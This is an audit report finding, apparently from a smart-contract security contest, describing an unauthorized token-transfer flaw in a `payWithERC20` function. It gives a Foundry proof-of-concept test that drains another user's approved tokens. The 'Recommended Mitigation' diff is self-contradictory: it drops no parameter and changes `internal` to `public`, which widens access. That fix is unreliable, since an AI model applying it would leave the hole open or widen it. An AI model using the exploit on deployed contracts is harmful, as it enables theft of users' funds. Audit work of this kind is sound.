Great Ruby Woodpecker

High

# Users who approve the Blueprint contract, may lead to Unauthorized Token Transfers via `payWithERC20` function.


**Description:** 
The `payWithERC20` function allows any caller to transfer tokens from any address that has approved the contract, without verifying that `msg.sender` has permission to spend tokens on behalf of `fromAddress`. This is because the function takes an arbitrary fromAddress parameter instead of using `msg.sender` as the source of funds.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25

**Impact:** 
Attackers can drain all approved tokens from victim addresses, This affects multiple critical functions including `userTopUp`, `createAgentWithToken`, and `updateWorkerDeploymentConfig`, putting users funds at risk.

**Proof of Concept:**
```solidity
    function testUnauthorizePay() public {
        address alice = makeAddr("alice");
        address bob = makeAddr("bob");
        vm.startPrank(alice);
        mockToken.mint(alice, 1000);
        mockToken.approve(address(blueprint), 1000);
        vm.stopPrank();

        vm.startPrank(bob);
        blueprint.payWithERC20(address(mockToken), 100, alice, bob);
        vm.stopPrank();
    }
```
**Recommended Mitigation:** 
```diff
- function payWithERC20(address erc20TokenAddress, uint256 amount, address toAddress) internal { 
+ function payWithERC20(address erc20TokenAddress, uint256 amount, address toAddress) public { 
}
```
